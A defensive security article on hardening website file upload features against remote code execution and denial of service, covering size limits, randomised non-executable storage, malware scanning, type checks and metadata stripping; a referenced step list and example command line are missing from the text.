File upload features allow users to upload arbitrary data to a website. Reasons for providing this feature range from image and video uploads on social media sites, PDF uploads for financial services sites, to document uploads for repository sites. However, as we will discuss, successfully implementing these features present many security and design challenges. Whilst the particular reasons for providing file upload features are not the focus of our discussion here, we will assume a generic use case arising from the requirement to upload some form of binary data to a website.
Penetration testers will pay close attention to any file upload feature when testing a site for vulnerabilities. Testing will typically involve the submission of EICAR test virus payloads, oversize payloads, wrongly named and wrongly sized payloads, payloads masquerading as different types of file content and so forth. They will carefully test the defences and responses of upload functions because they fully appreciate the problems that can arise when they are not properly secured.Within the field of information security, we need to concern ourselves with the risk exposed by certain system features. Typically, these risks will be categorized in terms of their impacts on the underlying system, and to the wider organisation. Of particular concern are software vulnerabilities leading to Remote Code Execution (RCE), or Arbitrary Code Execution (ACE). RCE is a particularly damaging type of server vulnerability in which a remote attacker with network access manages to install and execute their own code on our servers. Once malicious code is running on a server, the server effectively falls under the control of the attacker. In many cases this compromise will remain hidden, providing the attacker a foothold within the organisation to perform further system compromise.
From the perspective of a potential attacker, there are three steps required to achieve this code execution:When we power on our computers, the first part of an initialization process begins in the computers non-volatile ROM or FLASH storage. This first stage typically reads a small piece of code contained within the first sector of the hard disk. This small piece of code in turn loads a larger, more functional piece of code which understands file system structures. This larger program loads the operating system kernel into memory and transfers control to it. Finally, the operating system will initialize itself before handing control to the user.
Many remote code execution exploits follow a similar process. The initial code that gets executed as part of step 3 above could be as simple as:This single line of code will download a larger, more capable script from a compromised server and execute it. Whilst this example is for Unix based servers, similar scripts can be constructed in PowerShell for Windows servers. Part of an attackers initial reconnaissance will involve the discovery of underlying operating systems.
Essentially, providing a file upload feature is the ready made provision of step 1. If the system allows the attacker to specify a filename that the server dutifully uses, step 2 may also be available to the attacker.Upload functions should be subject to maximum upload sizes and rate limiting, which also allows for worst-case storage planning. For example, if 1000 users are allowed 10 uploads per day of 1mb maximum, worst case storage requirements are approx. 10Gb per day. When receiving this payload the maximum payload size should be strictly enforced to prevent unreasonably large payloads being uploaded. Many large payloads may exhaust the servers storage and cause a Denial Of Service (DOS) attack vector.
Critically, assume nothing about the contents of the file you have been given. Assume its contents to be hostile until proven otherwise. Any data that is provided alongside the binary payload such as date, time, filename, filetype or mime type, file size, etc. should be discarded, or logged before discarding. All this meta data can be very easily forged, so it is best to treat it as unreliable and ignore it.Log all upload activity and store client information such as IP, UA agent identifier, etc. Again, whilst not necessarily reliable information, this will allow for correlation and investigation of potential abuse patterns.
This leaves us with the binary payload, which in most cases will be written to disk in a temporary storage location ready for further processing. Whilst the filename provided as part of the upload meta data can be used for information purposes, this filename should not be used as the disk filename.The location and name of this temporary file should be carefully considered. Ideally, it should be totally random to provide protection against step 2 above, since the attacker now needs to determine both the filename and its location in order to execute it. It should also exist in a directory well away from the directory serving the website, possibly on a separate server or under a separate user from the user running the web server software. It should also have all execute permissions removed to help defend against step 3 above.
Once the browser upload process has completed, we should be left with a randomly named, non executable disk file stored in a protected directory, owned by a different user than the user running the web server. This user should have bare minimum filesystem permissions.Before any further processing takes place, we should provide anti-virus scanners an opportunity to inspect the file for any known threats. This can be achieved by using on-access scanners to automatically scan the file once written to the filesystem, or on-demand scanners triggered after the initial file upload. Multiple virus and malware scanners could be considered, and a file hash could also be submitted to VirusTotal for an extra layer of assurance. Note that in the case of VirusTotal we are only submitting the SHA-256 hash of the file, not the file contents since this may lead to an Information Disclosure vulnerability. In all cases, the upload workflow should take account of these delays and afford the scanners time to do their work.
Since we cannot assume the file data corresponds to the specified file type, we should run additional steps to try to establish the payload contents are of the type expected by the function. A utility such as the linux file command may help to do this, which attempts to establish the corresponding mime type for any given binary file. Note however that this is not foolproof, and malicious binary payloads can still be constructed to defeat such utilities.From this point, further payload processing depends on the actual design requirements. In most cases an attempt should be made to normalize this file into a format that is both useful and performant to the application. Images for example can be downsized and scaled to a standard size before storing.
Additional processing may also be required. Many file types such as images, PDFs and Word documents contain metadata, some of which may be of a personal nature. Unless there is a specific application use for this data, it is recommended to strip this before storing. For instance, many JPEG image files will contain EXIF data within the image which may include GPS co-ordinates of the image location.